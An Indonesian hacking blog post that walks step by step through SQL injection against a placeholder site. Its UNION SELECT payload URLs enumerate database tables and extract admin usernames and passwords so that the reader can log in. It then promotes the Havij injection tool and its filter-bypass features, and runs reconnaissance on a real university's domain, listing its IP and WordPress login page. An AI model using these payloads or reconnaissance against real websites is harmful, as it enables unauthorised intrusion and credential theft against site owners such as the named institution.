MENCARI TARGET WEBSITE

-

MENCARI TARGET WEBSITE



Cara ngehacking web atau biasa disebut web attack sangat banyak caranya, salah satunya dengan cara SQL injection.
apa itu SQL injection ?
SQL injection terjadi ketika attacker bisa meng-insert beberapa SQL statement ke ‘query’ dengan cara manipulasi data input ke applikasi tersebut
ini salah satu cara melakukan tekhnik SQL injection:


1. Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah

http://www.target.com/berita.php?id=100

2. Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
Contoh :

http://www.target.com/berita.php?id=100'


atau

http://www.target.com/berita.php?id=-100

 3. Maka akan muncul pesan error…

 “You have an error in your SQL syntax.You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near ”’
at line 1″ Dan masih banyak lagi macamnya.
4. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya…
Disini kita akan menggunakan perintah order by
Contoh :

 
http://www.target.com/berita.php?id=100+order+by+1/*

 Hohoho…apalagi itu “/*” ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake “–”. Terserah aja…
Kalo “+” sebagai penghubung perintah…

5. Nah sampe sini langsung dah nyobain satu2…

 
http://www.target.com/berita.php?id=100+order+by+1/* (gak ada error)
http://www.target.com/berita.php?id=100+order+by+2/* (gak ada juga)
http://www.target.com/berita.php?id=100+order+by+3/* (capek dah)
http://www.target.com/berita.php?id=100+order+by+4/* (jangan nyerah)

 Sampai muncul error…
Misalkan errornya disini…

 
http://www.target.com/berita.php?id=100+order+by+10/*

 Berarti yang kita ambil adalah “9″

 
http://www.target.com/berita.php?id=100+order+by+9/*

 6. Untuk mengetahui berapa angka yang show sekarang kita pake UNION
Contoh :
http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*
Trus perhatikan angka berapa yang keluar (Kayak togel aja… ;p)

 7. Misalnya angka hoki yang keluar adalah “3″ maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah “version()” atau “@@version”

 
http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*
Atau
http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*

 8. Nah kalo versinya 5 langsung aja pake perintah “information_schema” untuk melihat tabel dan kolom yang ada pada database…

 Contoh :

 
http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*

 Nah katanya kalo untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL. Tapi waktu itu gua gak pake keliatan kok tabelnya…Apa gua salah? Mungkin tapi sekarang yang gua mau jelaskan adalah VERSI DAN PENGALAMAN GUA. Mungkin agak lain…ya maklum lah baru belajar…Hehehe…
Misalnya yang lo liat adalah table “admin”
Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata “table”-nya…

 Contoh:

 
http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*
Misalnya kolom yang keluar adalah “password” dan “username”
Langsung aja kita liat isinya…

 Contoh :

 
http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*
dan
http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*

 Bisa diliat dah username ama passwordnya…Tinggal login…Cari yang asik terus…Terserah Anda…
—————————————————
anda masih belum paham tentang apa SQL injection ?...silahkan anda download file dokumen dibawah ini tentang SQL injection step by step.(Cara diatas sudah dicoba pada Website kantor"buat uji coba"ternyata eng ink enk...)

oke selamat mencoba. yang terpenting jangan dilakukan di web teman anda ataupun di website Lokal.
referensi :

http://jasakom.com
http://ezine.echo.or.id
http://cruzenaldo.co.cc
http://students.ee.itb.ac.id

 Atau mau mencoba tool yang baru saya dapatkan? namanya Havij. Adapun fitur2nya:
  1. Supported Databases with injection methods:
    • MsSQL 2000/2005 with error
    • MsSQL 2000/2005 no error (union based)
    • MySQL (union based)
    • MySQL Blind
    • MySQL error based
    • Oracle (union based)
    • MsAccess (union based)
  2. Automatic database detection
  3. Automatic type detection (string or integer)
  4. Automatic keyword detection (finding difference between the positive and negative response)
  5. Trying different injection syntaxes
  6. Proxy support
  7. Real time result
  8. Options for replacing space by /**/,+,… against IDS or filters
  9. Avoid using strings (magic_quotes similar filters bypass)
  10. Bypassing illegal union
  11. Full customizable http headers (like referer and user agent)
  12. Load cookie from site for authentication
  13. Guessing tables and columns in mysql<5 (also in blind) and MsAccess
  14. Fast getting tables and columns for mysql
  15. Multi thread Admin page finder
  16. Multi thread Online MD5 cracker
  17. Getting DBMS Informations
  18. Getting tables, columns and data
  19. Command executation (mssql only)
  20. Reading system files (mysql only)
  21. Insert/update/delete data



         Pada kali ini kita akan melakukan pencarian informasi terhadap website targer. nah pada kali ini saya akan mencari informasi lokasi server, mencari ip domain, serta dia menggunakan tools apa pada websitenya.

    Sebelum kita melakukan, tentukan dulu target website yang akan kita telusuri. Pada kali ini saya menggunakan website untuk mencari tahu website targer. Targer yang kita akan jadikan percobaan yaitu website kampus Universitas Muslim Indonesia (UMI).

       Pertama kita akan mencari website yang dapat mengetahui informasi tentang website, website yang saya gunakan untuk mencari yaitu Situs Web dnsdumpster.com dnsdumpster.com 
pada tampilan awal kita masukkan Domain website, lihat pada gambar dibawah ini



kemudian setalah masukkan domain silahkan kelik search, maka secara otomatis akan mencari tahu dimana lokasi serta ip yang digunakan website. pada kali ini saya memasukkan Domain umi.ac.id
Berikut hasil pencarian saya :

Lokasi Server ip



nah pada kali ini servernya berada di suatu negara united states adalah sebutan untuk negara amerika serikat, pertanyaan mengapa di negara lain bukan di negara indonesia nanti saya akan jelaskan mengapa terjad seperti itu.

Domain dan IP yang digunkana





pada gambar di atas terlihat dia menggunakan ip 173.82.168.28 dimana itu adalah ip pada website Umi.ac.id

pada kali ini saya akan menjelaskan mengapa dia berada di negara america karena untuk website umi.ac.id ini menggunakan tools wordpress mari kita lihat pada login wordpress umi.ac.id :





nah pada tampilan di atas terlihat tampilan login pada wordpress. wordpress merupakan website yang bertipe cms, banyak medai berita yang menggunakan sebab mudah untuk kita gunakan dalam menyampaikan informasi dan mengupdate informasi peristiwa, atau hal yang unjen dan menarik untuk di informasikan.


Demikian dari saya, mungkin itu saja yang dapat saya bagikan tentang Mencari Targer Website. untuk mengetahui atau ingin bertanya silahkan berkomentar jika saya tahu saya akan berbagi namun jika tidak nanti saya akan cari tahu dan bagikan kepada anda . Jika teman-teman belum paham silahkan komentar di bawah bagian yang belum anda pahami.

Komentar

Posting Komentar

Postingan populer dari blog ini

5 TAHAPAN HACKING

-
Gambar
5 TAHAPAN HACKING 1)        Reconnaissance Reconnaissance adalah tahap mengumpulkan data, dimana hacker akan mengumpulkan data tentang target sebanyak-banyaknya. Baik nama anggota keluarga, tanggal lahir, tempat kerja beserta informasi didalamnya. Dan itu hanya sebagian kecil kegunaan dari tahapan Reconnaissance. Reconnaissance terbagi menjadi dua yaitu Active Reconnaissance dan Passive Reconnaissance. a.         Active Reconnaissance (Pengintaian aktif) Si hacker melakukan proses pengumpulan informasi dengan cara yang sangat beresiko karena beraktifitas langsung dengan korban atau rekan korban, ini berguna untuk mencari celah yang akan digunakan sang hacker. b.        Passive Reconnaissance (Pengintaian Passive) Disini merupakan kebalikan dari Active Reconnaissance, dimana sang hacker melakukan pencarian informasi tanpa sepengetahuan korban, sebagai contoh mencari data tentang korban di internet, majalah dan koran. 2)        Scanning Ini adalah sign dimulainya penyerangan
Baca selengkapnya

Model subnet Classless,CIDR,VLSM

-
Gambar
Subnetting Classless Secara sederhana classless dapat disimpulkan tidak menggunakan kelas atau tanpa adanya kelas. Jika dihubungan dengan pengalamatan IP, maka pengalamatan IP tanpa menggunakan kelas dengan menggunakan CIDR atau Classless Inter Domain Rouing. Format pengalamatannya adalah dengan memberikan tanda “/” di belangan alamat IP kemudian diikuti variable panjang prefiks. Pengalokasian host atau IP yang dapat menggunakan subnet mask yang tidak sama dan didukung oleh routing protocol dapat memberikan informasi subnet sehingga dapat menghemat sejumlah alamat host atau IP. Saat ini cara classless addressing sudah mulai banyak dilakukan yakni melalui pengalokasian IP Address dengan notasi CIDR. Arti lainnya yang digunakan untuk memanggil sisi IP Adress ini menunjuk satu jaringan secara lebih khusus. Hal ini juga dimaksud dengan Network Prefix. Biasanya pada penulisan network prefix 1 kelas IP Address digunakan sinyal garis miring “/” dan diikuti angka yang memberikan network
Baca selengkapnya